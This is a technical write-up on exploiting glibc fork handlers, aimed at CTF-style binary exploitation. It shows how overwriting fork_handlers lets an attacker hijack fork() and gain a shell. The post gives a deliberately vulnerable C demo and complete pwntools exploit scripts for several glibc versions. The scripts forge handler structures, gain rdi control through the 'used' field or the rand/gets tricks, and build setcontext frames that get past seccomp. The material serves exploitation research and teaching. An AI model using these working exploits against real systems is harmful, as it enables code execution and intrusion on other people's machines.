# fork\_gadget

Some of you may be familiar with the exit handlers which are run when calling `exit()`. These are typically used to clean up anything before the program is terminated, but they're also quite useful for attackers to hijack code execution. They're ideal, because by overwriting the [\_\_exit\_funcs](https://elixir.bootlin.com/glibc/glibc-2.35/source/stdlib/cxa_atexit.c#L76) array, you can specify functions to be called, along with a controlled argument. However, one downside is that, because they're popular with attackers, glibc applies pointer mangling to the function pointers.

However there are other places where handlers like these are used. One place I stumbled across while investigating the exit handlers was the fork handlers, and after some investigation, I found some tricks to abuse them to convert `fork` into a constraintless one gadget.

## Cheatsheet

Below is a cheatsheet for all the tricks covered in this post:

{% embed url="" %}

## What are the fork handlers?

`fork` has its own handlers for multiple situations:

* `prepare_handler`
* `parent_handler`
* `child_handler`

These are stored in a single array/linked list called `fork_handlers`, which exists in a writable region of libc memory, so that more handlers can be added. In each case, all of the handlers of the corresponding type are executed in a specific order.

There are a few things that separate these from exit handlers:

* :white\_check\_mark: No pointer mangling.
* :x: No argument control.

So 1 step forward, and 2 steps back. However, while we don't get explicit argument control like with exit handlers, there are similar tricks to what we did in [ret2gets](/pwn-notes/pwn/rop-2.34+/ret2gets.md). To see that, let's have a closer look at `fork` across multiple versions, as the implementation of the handlers has changed, which also changes how we'd abuse them.
{% file src="/files/Kf3ClPLgA37jFvEVIR3o" %}
Files used for the demos
{% endfile %}

## 2.28-2.35

(The specific version used here is `2.35`)

Let's first have a look at what a `fork_handler` looks like:

* `prepare_handler`: Handlers to prepare the process to `fork`, so they're run *before* the `fork`.
* `parent_handler`: Handlers run as the *parent* after the `fork`.
* `child_handler`: Handlers run as the *child* after the `fork`.
* `dso_handle`: A unique id to identify which binary/shared library registered this handler.

These are stored in an array called `fork_handlers`, which is defined as:

The way this definition works is by stating a few "parameters" using macros, then including [malloc/dynarray-skeleton.c](https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/dynarray-skeleton.c), which then defines a struct called `fork_handler_list`, plus a bunch of helper functions for this struct.

These `dynarray` structures are dynamically allocated arrays, which can resize if needed. Usually they have an initial (inline) buffer which is used before the array moves to the heap. Evaluating this yields:

```c
struct fork_handler_list {
    size_t used;                      /* number of elements in use */
    size_t allocated;
    struct fork_handler* array;
    struct fork_handler scratch[48];  /* initial inline buffer */
};
```

`fork` is defined as follows:

Here we call `__run_fork_handlers` with [atfork\_run\_prepare](https://elixir.bootlin.com/glibc/glibc-2.35/source/include/register-atfork.h#L37), indicating it wants to execute the `prepare` handlers.

So now it will go through the array starting from the last element (for backwards compatibility reasons), executing each `prepare_handler` if it exists. `fork_handler_list_size` and `fork_handler_list_at` are some of the functions automatically defined when we defined `fork_handler_list`; they just get the length (`used`) and index the array respectively. Locking may also be used, if there are multiple threads running.

### So what?

At first glance, taking control of code execution doesn't seem to be very doable, mainly due to the fact that we seemingly have no argument control. However, if we dig deeper, and look at the disassembly, we'll notice something interesting.

`__run_fork_handlers+288`: Locking `atfork_lock`

First it checks the first argument `edi`; if it's `0`, it should run the `prepare` handlers. It then checks whether it should use locking: if so, it jumps to `+288`, takes the lock, and resumes by jumping back to `+23`. But then something interesting happens. `[fork_handlers]` (which corresponds to `fork_handlers->used`) is loaded into `rbp`, and is then loaded into `rdi`. How interesting! It then goes on to call the `prepare_handler`:

`__run_fork_handlers+84`: Decrements `rbp` (the index)

`__run_fork_handlers+48`: Calls the `prepare_handler`

So theoretically, controlling the field `used` could grant us `rdi` control.

### Why does this happen?

The reason for this is the [same reason](/pwn-notes/pwn/rop-2.34+/ret2gets.md#io_stdfile_0_lock-in-rdi) why [ret2gets](/pwn-notes/pwn/rop-2.34+/ret2gets.md) works. Let's go back to `+84` (when the index is decremented):

`__run_fork_handlers+84`: Calling `__libc_dynarray_at_failure`?

`+91` checks the index `rbp` is within the bounds of the array (less than `used`). If it's not, then it goes on to call [\_\_libc\_dynarray\_at\_failure](https://elixir.bootlin.com/glibc/glibc-2.35/source/malloc/dynarray_at_failure.c#L23), interestingly setting a second argument, but not a first? Well that's because it already set the first argument: when `used` gets loaded. It could load `used` into any register, but chooses `rdi`, because in the case where this error happens, it doesn't need to waste time loading it into `rdi` again, because it's already there.

fork_handler_list_at: Checks the bounds, and calls the failure function with the size and index.
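As a rough mental model (not glibc's code), the prepare loop and the bounds check can be sketched in plain Python. The names `ForkHandlerList`, `DynarrayAtFailure` and `run_prepare` are made up for illustration, and only the `prepare_handler` slot is modelled. The point is that `used` is the first value handed to the failure path, which is why the compiler is happy to keep it in `rdi`.

```python
class DynarrayAtFailure(Exception):
    """Stands in for __libc_dynarray_at_failure(size, index)."""

    def __init__(self, size, index):
        super().__init__(f"index {index} out of range for size {size}")
        self.size = size
        self.index = index


class ForkHandlerList:
    """Toy stand-in for fork_handler_list (prepare handlers only)."""

    def __init__(self, prepare_handlers):
        self.array = list(prepare_handlers)
        self.used = len(self.array)

    def at(self, index):
        # Bounds check: on failure, `used` is the *first* argument.
        if index >= self.used:
            raise DynarrayAtFailure(self.used, index)
        return self.array[index]


def run_prepare(handlers):
    """Walk the list from the last element down, calling each handler."""
    for i in range(handlers.used, 0, -1):
        handler = handlers.at(i - 1)
        if handler is not None:
            handler()
```

Registering three handlers and calling `run_prepare` runs them in reverse registration order, skipping empty slots.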

### Exploitation

```c
#include <stdio.h>
#include <unistd.h>

void setup() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);
}

int main() {
    setup();

    /* libc leak */
    printf("%p\n", &fgets);

    /* arbitrary write */
    printf("Enter address, size and data: ");
    unsigned long addr, size;
    scanf("%lu %lu ", &addr, &size);
    fgets((void*)addr, size, stdin);

    /* the call we want to hijack */
    fork();
}
```

To demonstrate this, we'll use the ~~very realistic application~~ attack scenario above, where we have a libc leak, an arbitrary write, and a call to `fork` we want to hijack.

We can start by writing some basic methods to create the structures:

```python
def header(addr, size):
    return flat({
        0x00: size,
        # we don't need to control allocated
        0x10: addr
    })

def handler_array(*funcs):
    assert funcs
    data = bytearray(0x20*len(funcs) - 0x18)
    # handlers are run from the last element, so store them reversed
    for i, func in zip(range(0, len(data), 0x20), funcs[::-1]):
        data[i:i+8] = p64(func)
    return data
```

So we can use `handler_array(libc.sym.system)` to craft an array that will execute `system`, but we now need to control `rdi`. We can do this by setting `used` to some pointer to `/bin/sh`. However if we use a regular address to point to the handler array, then the huge `used` value will make it read the "last" handler from far outside the array, i.e. from invalid memory.

So if we need `used` to be an address, why don't we just alter the address of the handler array? As long as

```c
fork_handlers->array[fork_handlers->used-1]
```

points to our handler, then it'll work. We can forge such an address as follows:

```python
addr = (addr - (size-len(funcs))*0x20) % (1<<64)
```

Of course this will create an "address" that's complete nonsense, but that doesn't matter, as it won't access the start of the array (unless [\_\_register\_atfork](https://elixir.bootlin.com/glibc/glibc-2.35/source/posix/register-atfork.c#L34) or [\_\_unregister\_atfork](https://elixir.bootlin.com/glibc/glibc-2.35/source/posix/register-atfork.c#L75) is used).
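To convince ourselves the arithmetic works out, here's a small standalone check in plain Python (no pwntools). The two addresses are made-up placeholders rather than values from a real libc, and `forged_base` / `element_addr` are hypothetical helper names. It only shows that indexing the forged base with `used-1` wraps back around (mod 2^64) onto our real handler.

```python
MASK64 = (1 << 64) - 1
HANDLER_SIZE = 0x20  # sizeof(struct fork_handler) on 2.28-2.35


def forged_base(handlers_addr, n_funcs, used):
    """Fake `array` pointer such that array[used-1] is our last handler."""
    return (handlers_addr - (used - n_funcs) * HANDLER_SIZE) & MASK64


def element_addr(base, index):
    """Address of array[index], with 64-bit wraparound like the CPU does."""
    return (base + index * HANDLER_SIZE) & MASK64


# Placeholder values, purely for illustration.
handlers_addr = 0x7ffff7e1b6b0   # where our forged handlers really live
binsh = 0x7ffff7dd8698           # value we want in `used` (and so in rdi)

base = forged_base(handlers_addr, 1, binsh)
first_called = element_addr(base, binsh - 1)

print(hex(base))
print(hex(first_called))
```

The second printed value is `handlers_addr` again, even though `base` itself is a nonsense address.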
Putting this all together, we can arrive at the following exploit:

```python
#!/usr/bin/python3
from pwn import *

e = context.binary = ELF('vuln')
libc = ELF('libc', checksec=False)
p = e.process()

fgets = int(p.recvline(), 16)
log.info(f"fgets: {hex(fgets)}")
libc.address = fgets - libc.sym.fgets
log.info(f"libc: {hex(libc.address)}")

def header(addr, size):
    return flat({
        0x00: size,
        0x10: addr
    })

def handler_array(*funcs):
    assert funcs
    data = bytearray(0x20*len(funcs) - 0x18)
    for i, func in zip(range(0, len(data), 0x20), funcs[::-1]):
        data[i:i+8] = p64(func)
    return data

def forge_split(addr, *funcs, rdi=None):
    array = handler_array(*funcs)
    if rdi is not None:
        size = rdi
        assert size >= len(funcs)
        addr = (addr - (size-len(funcs))*0x20) % (1<<64)
    else:
        size = len(funcs)
    return header(addr, size), array

def forge(addr, *funcs, rdi=None):
    hdr, arr = forge_split(addr+0x18, *funcs, rdi=rdi)
    return hdr + arr

addr = libc.sym.fork_handlers
data = forge(addr, libc.sym.system, rdi=next(libc.search(b"/bin/sh\x00")))
assert b"\n" not in data

p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data)

p.interactive()
```

### Is that all we can do?

This is the basic payload, but we can do more than just this. Take for example, a case where seccomp is in place, and we don't have access to `execve`, meaning calling `system` is useless now! Is that all we can do with a function call with a controlled argument?

~~Yes, thanks for reading.~~

This is where `setcontext` comes in! I covered this already [here](/pwn-notes/pwn/setcontext.md), but basically this allows us to get ROP through the use of a function resembling the `sigreturn` syscall.
We can substitute this in as follows:

```python
def setcontext(regs, addr):
    frame = SigreturnFrame()
    for reg, val in regs.items():
        setattr(frame, reg, val)
    # needed to prevent SEGFAULT
    setattr(frame, "&fpstate", addr+0x1a8)
    fpstate = {
        0x00: p16(0x37f),    # cwd
        0x02: p16(0xffff),   # swd
        0x04: p16(0x0),      # ftw
        0x06: p16(0xffff),   # fop
        0x08: 0xffffffff,    # rip
        0x10: 0x0,           # rdp
        0x18: 0x1f80,        # mxcsr
    }
    return flat({
        0x00 : bytes(frame),
        # 0xf8: 0            # end of SigreturnFrame
        0x128: 0,            # uc_sigmask
        0x1a8: fpstate,      # fpstate
    })

addr = libc.sym.fork_handlers
addr_ctx = addr+0x20
data = forge(addr, libc.sym.setcontext, rdi=addr_ctx) + setcontext({
    "rdi": next(libc.search(b"/bin/sh\x00")),
    "rsi": 0,
    "rdx": 0,
    "rip": libc.sym.execve,
    "rsp": addr_ctx+0x200
}, addr_ctx)
assert b"\n" not in data
```

For demo purposes, I'm just executing `execve`, but you can do much more with `setcontext`.

### gets

Both of these examples require the `/bin/sh` string or the `SigreturnFrame` to already exist in memory, or be a part of the arbitrary write. But what if we don't have such a luxury?
Well since `rdi` will be controlled for every function call, we can use `gets` to write data to the argument, before using it for `system`:

```python
addr = libc.sym.fork_handlers
data = forge(addr, libc.sym.gets, libc.sym.system, rdi=addr+0x200)
assert b"\n" not in data

# could also be any command we wish
extra_data = b"/bin/sh"

p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data)
if extra_data:
    p.sendline(extra_data)

p.interactive()
```

Or `setcontext`:

```python
addr = libc.sym.fork_handlers
addr_ctx = addr+0x20
data = forge(addr, libc.sym.gets, libc.sym.setcontext, rdi=addr_ctx)
assert b"\n" not in data

extra_data = setcontext({
    "rdi": next(libc.search(b"/bin/sh\x00")),
    "rsi": 0,
    "rdx": 0,
    "rip": libc.sym.execve,
    "rsp": addr_ctx+0x200,
}, addr_ctx)
assert b"\n" not in extra_data

p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data)
if extra_data:
    p.sendline(extra_data)

p.interactive()
```

### Seccomp strikes back!

Our good old ~~friend~~ enemy seccomp isn't always easily defeated by `setcontext`, because there's a nuisance I have yet to cover. If we have another look at `setcontext`:

`setcontext`: Calling `sigprocmask` syscall.

We see that it executes a syscall *before* it sets the context, with syscall number `0xe`. This is `sigprocmask`, and while it may not be on the radar of any blacklists, it could be easily left out of a whitelist (like `seccomp`'s strict mode), meaning this could invoke `seccomp`'s wrath. What if we tried to skip the syscall? It's a good suggestion, but a wrench in the plan here is the fact that it restores the pointer to the context in `rdx`, not `rdi`, so we'd need to control `rdx` somehow. Wouldn't it be nice if we could convert our current `rdi` control into `rdx` control, because `rdx` isn't used by `__run_fork_handlers`. Well it turns out there is a gadget that can do just that!

Exactly one in fact. However if you're anything like me (~~and I surely hope not~~), you'd wonder where this came from, and is this something that's likely to come up across multiple versions of libc, because it would be nice if our techniques were portable(ish).

It seems to belong to a function `__memset_erms`, which in hindsight makes sense. It explains the `rep stos` instruction: it's filling the buffer with the character `al`. And since `rep stos` increments `rdi`, it needs to save a copy, so that it can return that original pointer, as that's the [defined behaviour](https://man7.org/linux/man-pages/man3/memset.3.html#RETURN_VALUE) of `memset`. But why did it compile like this, and why is `rdx` used, surely this could change, right? Well let's find out:

Using `list` to find where it's defined.

Turns out the reason it compiled that way is because that's exactly how libc wanted it: it was written in assembly language (`.S` is a common extension for assembly language files). From what I could see, this behaviour is also consistent across many versions, probably because there's no real reason to change it:

* It's simple, so not much to change in the first place.
* If it ain't broke, don't fix it.
* It's not actually used, it's just used for performance measuring.

Fantastic, we have a `mov rdx, rdi` gadget! But one final snag, we ideally want to set `rcx` or `rdx` to `0` before this gadget executes, so that `rep stos` finishes immediately (i.e. doesn't run).
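To see why the count needs to be zero, here's a toy Python model of what this gadget does to the registers. It assumes the instruction sequence is `mov rdx, rdi; rep stosb; mov rax, rdx; ret` (inferred from the description above, so check your own libc), models memory as a plain dict, and assumes the direction flag is clear. `memset_erms_tail` is a made-up name.

```python
def memset_erms_tail(regs, mem):
    """Toy model of: mov rdx, rdi ; rep stosb ; mov rax, rdx ; ret"""
    regs = dict(regs)              # don't mutate the caller's registers
    regs["rdx"] = regs["rdi"]      # mov rdx, rdi  (save the original pointer)
    while regs["rcx"] != 0:        # rep stosb: store al, rcx times
        mem[regs["rdi"]] = regs["rax"] & 0xff
        regs["rdi"] += 1
        regs["rcx"] -= 1
    regs["rax"] = regs["rdx"]      # mov rax, rdx  (memset's return value)
    return regs


# With rcx == 0 nothing is written and rdi survives for the next handler.
mem = {}
after = memset_erms_tail({"rdi": 0x1000, "rcx": 0, "rax": 0x41, "rdx": 0}, mem)
```

With a non-zero `rcx`, the same model writes `rcx` bytes starting at `rdi` and leaves `rdi` advanced past them, which is exactly the memory corruption we want to avoid.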

Putting this all together, we arrive at the following:

```python
addr = libc.sym.fork_handlers
addr_ctx = addr+0x100
data = forge(addr, libc.sym.gets, libc.address+0xa85d8, libc.sym.__memset_erms+13, libc.sym.setcontext+45, rdi=addr_ctx)
assert b"\n" not in data

extra_data = setcontext({
    "rdi": next(libc.search(b"/bin/sh\x00")),
    "rsi": 0,
    "rdx": 0,
    "rip": libc.sym.execve,
    "rsp": addr_ctx+0x200
}, addr_ctx)
assert b"\n" not in extra_data

p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data)
p.sendline(extra_data)

p.interactive()
```

### 2.28-2.29

There's a weird edge case that I found with `2.28-2.29`, which seems to coincide with the versions that didn't have the `do_locking` argument (which was added in [2.30](https://elixir.bootlin.com/glibc/glibc-2.30/source/nptl/register-atfork.c#L110)).

Above we see that the `used` field is loaded into `rax`, but not into `rdi`. But after the first call:

`used` *is* loaded into `rdi`. Weird...

I can't quite explain why this happens, but this is more just a word of warning that this isn't an exact science. If you find this happening, you can always just start with a `ret` as the first handler to get past the first call, which would also be compatible with `2.30+`. And if it doesn't happen at all? Well, `rdi` shouldn't be used by anything else if it's not used for `used`, so [ret2gets](/pwn-notes/pwn/rop-2.34+/ret2gets.md) would also be a possibility, however I am yet to test it.

## 2.36+

(The specific version used here is `2.39`)

You'll have noticed that the previous section was specifically for `2.28-2.35`. This is because the implementation of `fork_handlers` changes throughout the versions. So, what's changed now?

Well, not much actually. Firstly, the `fork_handler` struct has a new field: `id`

And a separate function for running `prefork` handlers has been created:

The function for running `prefork` handlers isn't much different either:

The main addition is the use of `id`. What seems to be implied by the comments here is that each handler now has a unique `id`, which increments each time a new one is added. This means ones added later will have a larger `id`. Due to the different locking pattern here, handlers could be de-registered and/or registered while a `prepare_handler` is being executed, so it ensures that only handlers that were already registered before the current one are executed, therefore skipping ones with a *higher* `id`.

For us, all this changes is that the structure of `fork_handler` is different: we just need to include an `id` field that increases with each handler. The updated helpers are as follows:

```python
def header(addr, size):
    return flat({
        0x00: size,
        0x10: addr
    })

def handler_array(*funcs):
    assert funcs
    data = bytearray(0x28*len(funcs))
    for i, func in enumerate(funcs[::-1]):
        off = i*0x28
        data[off:off+8] = p64(func)
        # id must increase along the array
        data[off+0x20:off+0x28] = p64(i)
    return data

def forge_split(addr, *funcs, rdi=None):
    array = handler_array(*funcs)
    if rdi is not None:
        size = rdi
        assert size >= len(funcs)
        addr = (addr - (size-len(funcs))*0x28) % (1<<64)
    else:
        size = len(funcs)
    return header(addr, size), array

def forge(addr, *funcs, rdi=None):
    hdr, arr = forge_split(addr+0x18, *funcs, rdi=rdi)
    return hdr + arr
```

### Revenge of the seccomp!

While these changes don't affect the regular cases for `system("/bin/sh")` or `setcontext`, they (indirectly) affect the `setcontext` case where we need to skip `sigprocmask`. In the version of glibc I used for the demo, `rdx` is used by `__run_prefork_handlers`:

Here we see at `+128` that `rdx=5*r14`, where `r14` is `sl` (the number of handlers). `rdx` then gets multiplied by `8`, which ultimately means `r14` got multiplied by `40`/`0x28` (the size of `fork_handler`). This is in preparation for the loop where it checks the `id` fields, which is why it actually points to the previous handler's `id` field (`-0x30` instead of `-0x28`).

In this case, we can actually set `used` to a value that, when multiplied by 5, points to a context. This will make `rdi` a junk value, which means you can't use `gets` to populate the context (RIP), but apart from that, it's no problem!

```python
ret = ROP(libc).find_gadget(["ret"]).address

addr = libc.sym.fork_handlers
addr_ctx = addr+0x100
# round up to a multiple of 5, so that 5*used == addr_ctx exactly
addr_ctx += (-addr_ctx) % 5
rdi = addr_ctx // 5

data = forge(addr, ret, libc.sym.setcontext+45, rdi=rdi)
data = data.ljust(addr_ctx-addr, b"X")
data += setcontext({
    "rdi": next(libc.search(b"/bin/sh\x00")),
    "rsi": 0,
    "rdx": 0,
    "rip": libc.sym.execve,
    "rsp": addr_ctx+0x200
}, addr_ctx)
assert b"\n" not in data

p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data)

p.interactive()
```

## 2.27 and prior

(The specific version used here is `2.27`)

You may be wondering why I'm ending with the earliest implementation. This is because the later versions are more trivial, both in how `fork_handlers` is implemented, but also how they're exploited. This is because we no longer have the `rdi` control trick through the `used` field.

`fork_handler` is now defined as:

A few more fields than before:

* `next`: Points to next handler, as `__fork_handlers` is now a singly linked list.
* `refcntr`: Reference count of this handler.
* `need_signal`: Unused in `fork`, so we'll ignore it.

We're no longer using a `dynarray`, so there is no `used` field to control to gain `rdi` control (cringe).

Let's have a look at `fork` then:

Not much so far, it just checks `THREAD_SELF` to see whether the process is multi-threaded. There's also no function for handling the fork handlers anymore: it's incorporated into `fork` itself.

First it needs to access the root of the linked list of handlers: `__fork_handlers`. However since the process could be multi-threaded ~~and they didn't discover locking yet~~ it needs to do it in a thread-safe way (hence the weirdness with `atomic_full_barrier` etc.), but the gist is that it will grab `__fork_handlers` if it exists, and (atomically) increment the `refcntr` to claim ownership of it, ensuring it doesn't get freed while it's in use here.

{% hint style="info" %}
A lock doesn't seem to be needed, as the `fork_handler` entries are constant (besides `refcntr`, which is handled atomically, therefore not susceptible to racing). While it does work, the code with locking is just nicer.
{% endhint %}

__libc_fork: Executing `prepare_handler`'s

This now seems familiar, but instead of accessing an array, it's cycling through a linked list. It also saves the handlers it uses, so that it can use the same ones later for `parent_handler` and `child_handler`. To do this, it needs to claim ownership, so it increments the `refcntr`.

Importantly, there's no function calls with arguments present here, except for [alloca](https://elixir.bootlin.com/glibc/glibc-2.27/source/stdlib/alloca.h#L35) (compiler builtin) and [atomic\_increment](https://elixir.bootlin.com/glibc/glibc-2.27/source/sysdeps/x86_64/atomic-machine.h#L282) (`asm` block). So unlike `2.28+`, there's no `rdi` control, because no functions (with a first argument) are called.

We can write methods to forge a `fork_handler` list as follows:

```python
def forge(addr, *funcs):
    assert funcs
    data = b""
    for i, func in enumerate(funcs):
        next_ptr = addr+len(data)+0x30
        data += flat({
            # every handler links to the one after it; the last ends the list
            0x00: next_ptr if i != len(funcs)-1 else 0,
            0x08: func,
            0x28: p32(1),
        }, length=0x30)
    return data

def forge_packed(addr, *funcs, smallest=False):
    assert funcs

    if smallest:
        # some refcntrs are outside our data
        # (except the first one, which we need to control)
        # these will be incremented, and potentially corrupt some memory
        # be careful when using this
        size = max(0x28+4, 0x10*len(funcs))
    else:
        # all refcntrs are contained in our data
        size = 0x28 + 0x10*len(funcs) - 0xc

    data = bytearray(size)
    addrs = [addr+0x10*i for i in range(1, len(funcs))] + [0]
    for i, (addr, func) in enumerate(zip(addrs, funcs)):
        off = i*0x10
        data[off:off+0x10] = p64(addr) + p64(func)

    for i in range(len(funcs)):
        off = 0x28 + 0x10*i
        if off+4 > len(data):
            break
        # refcntr overlaps other data and gets incremented, so pre-decrement
        val = u32(bytes(data[off:off+4])) - 1
        # the first refcntr must be non-zero
        # otherwise it'll loop forever
        if i == 0:
            assert val != 0
        data[off:off+4] = p32(val % (1<<32))

    return bytes(data)
```

You can do a standard array (`forge`), or you can utilise the unused space to pack it as much as possible (`forge_packed`).
Both must contain at least the first `refcntr` though, as we need to ensure that it is non-zero. The rest of the `refcntr`'s will be incremented, and if these are outside our data, they *might* corrupt other data, but if that's not a concern, then you can use `smallest=True`.

### ret2rand

Therefore the only way we can control `rdi` is through `prepare_handler` calls. We need a function that will populate `rdi` with some writable address, which we could then write to using `gets`. [ret2gets](/pwn-notes/pwn/rop-2.34+/ret2gets.md) is unfortunately not very applicable here, as it's quite limited prior to `2.30` ([see here](https://sashactf.gitbook.io/pwn-notes/pwn/pages/pKfmKyEye0hMtzHAJiux#glibc-prior-to-2.30)).

Thankfully, I was able to find an alternative: `rand`. [rand](https://linux.die.net/man/3/rand) is a pseudo random number generator, and with that comes the need to keep track of the random state. In this case, that state is [unsafe\_state](https://elixir.bootlin.com/glibc/glibc-2.27/source/stdlib/random.c#L160), which is of type `random_state`:

This state is passed to `__random_r`, as the first argument :eyes:. What's more is that `__random_r` is relatively simple, doesn't make any function calls, or alter the pointer itself, which means that it can just keep `unsafe_state` in `rdi` (we'll look at this in a bit).

#### But what about the locking?

Well that's a good question, because we've seen before (in [ret2gets](/pwn-notes/pwn/rop-2.34+/ret2gets.md#io_stdfile_0_lock-in-rdi)) that locking `lock` can result in `lock` being loaded into `rdi`.

Ah, it's our good ol' friend `lll_unlock`.

Just like in [ret2gets prior to 2.30](https://sashactf.gitbook.io/pwn-notes/pwn/pages/pKfmKyEye0hMtzHAJiux#glibc-prior-to-2.30), it only unlocks by using `lll_unlock_wait_private` when it's multi-threaded, thus the single thread case works flawlessly and doesn't touch `rdi`.

The multi-threaded case is a bit more complex, but if it's locked with the value [LLL\_LOCK\_INITIALIZER\_LOCKED](https://elixir.bootlin.com/glibc/glibc-2.27/source/sysdeps/unix/sysv/linux/x86_64/lowlevellock.h#L57) (1), then it also doesn't touch `rdi` (yay). However, `lock` can also contain the value [LLL\_LOCK\_INITIALIZER\_WAITERS](https://elixir.bootlin.com/glibc/glibc-2.27/source/sysdeps/unix/sysv/linux/x86_64/lowlevellock.h#L58) (2), in which case the `dec` won't result in `0`, and will execute `lll_unlock_wait_private`, thus clobbering `rdi`. This should be unlikely to happen to `rand`'s [lock](https://elixir.bootlin.com/glibc/glibc-2.27/source/stdlib/random.c#L197), as you'd need multiple threads trying to access `rand` at the same time, but it's not impossible, so be careful.

#### Exploitation

So let's go back to `random`, specifically `__random_r`. We can use `rand` followed by `gets` to write to the `unsafe_state`, but we'll need to call `rand` again to put `unsafe_state` back into `rdi` after `gets`. And if we call `rand` using a corrupted `unsafe_state`, then we could cause a crash. So we need to conform to `random_state`:

But this contains multiple pointers, including at the beginning, where we might want to put `/bin/sh` string for example! But are these always used? Let's check `__random_r`:

At first glance, we can see the `fptr`, `rptr`, `state` pointers being used in the `else` clause. However, there's an interesting case: `buf->rand_type == TYPE_0`. This seems to be much simpler, and doesn't use `fptr` or `rptr`! It does still use `state`, but as long as it's populated with a writable address, it won't `SEGFAULT`. The default `rand_type` is [TYPE\_3](https://elixir.bootlin.com/glibc/glibc-2.27/source/stdlib/random.c#L119), but we can easily overwrite it to [TYPE\_0](https://elixir.bootlin.com/glibc/glibc-2.27/source/stdlib/random.c#L101).

Putting this together, we arrive at the following for `system("/bin/sh")`:

```python
addr = libc.sym.__fork_handlers
data = p64(addr+8) + forge_packed(addr+8, libc.sym.rand, libc.sym.gets, libc.sym.rand, libc.sym.system)
assert b"\n" not in data

extra_data = flat({
    0x00: b"/bin/sh\x00",
    0x10: libc.sym.randtbl+4,  # the previous `state` field
    0x18: p32(0),              # TYPE_0
})
assert b"\n" not in extra_data

p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data)
p.sendline(extra_data)

p.interactive()
```

We're also able to use this for `setcontext`:

```python
addr = libc.sym.__fork_handlers
data = p64(addr+8) + forge_packed(addr+8, libc.sym.rand, libc.sym.gets, libc.sym.rand, libc.sym.setcontext)
assert b"\n" not in data

ucontext = setcontext({
    "rdi": next(libc.search(b"/bin/sh\x00")),
    "rsi": 0,
    "rdx": 0,
    "rip": libc.sym.execve,
    "rsp": libc.sym.unsafe_state+0x200
}, libc.sym.unsafe_state)

extra_data = flat({
    0x10: libc.sym.randtbl+4,
    0x18: p32(0),  # TYPE_0
})
extra_data += ucontext[len(extra_data):]
assert b"\n" not in extra_data

p.sendlineafter(b"Enter address, size and data: ", f"{addr} {len(data)+2} ".encode() + data)
p.sendline(extra_data)

p.interactive()
```

### Return of the seccomp

This time our work is actually mostly done for us, because in `2.27` and prior, `setcontext` doesn't use `rdx` for the `ucontext`.

So it's just as simple as jumping to `setcontext+37` (or later).

## Detecting arguments to handlers

It can be quite cumbersome to check the disassembly to see what the arguments are going to be ahead of time. That's why I wrote a script, just like with [ret2gets](/pwn-notes/pwn/rop-2.34+/ret2gets.md#detecting-this-behaviour), which will trace `fork` with `angr`, and log what the arguments to each call to `prepare_handler` were.

{% embed url="" %}
`detect_fork.py`
{% endembed %}

## fork -> one\_gadget

So why would we care about this? I mean sure, we can control `fork` to either execute `system` for a shell, or `setcontext` for ROP/shellcode, but that's only useful if there are calls to `fork`. Not all applications will use `fork` after all.

What about functions in glibc? Surely some of them will use `fork`, after all there's functions like `system` which would create a new process to execute a shell command, right? Well unfortunately not many glibc functions use `__libc_fork`.

* [forkpty](https://elixir.bootlin.com/glibc/glibc-2.39/source/login/forkpty.c#L34)
* [grantpt](https://elixir.bootlin.com/glibc/glibc-2.39/source/sysdeps/unix/grantpt.c#L207)
* [daemon](https://elixir.bootlin.com/glibc/glibc-2.39/source/misc/daemon.c#L48)
* [\_IO\_old\_popen](https://elixir.bootlin.com/glibc/glibc-2.39/source/libio/oldiopopen.c#L91) (not used)
* [vfork](https://elixir.bootlin.com/glibc/glibc-2.39/source/posix/vfork.c#L26) (if the `vfork` syscall doesn't exist)

The rest, like `system` or `popen` will use an inlined `clone` call.

Well, like I mentioned in the beginning, by overwriting `fork_handlers`, we effectively have turned `fork` into a `one_gadget`. However, this has a few benefits over a regular `one_gadget`:

* No constraints.
* Can trigger ROP.

So if you have a function call primitive, and don't have strong argument control, but can use an arbitrary write, this may be useful. However, a lot of what's been done here can also be done with `exit`, and easier as well, as that has explicit argument control, the only downside there is that you have to deal with pointer mangling too.

In conclusion, there may be some cases where this can be useful, but even if this is never used, I still think it was interesting, and I hope you did too :)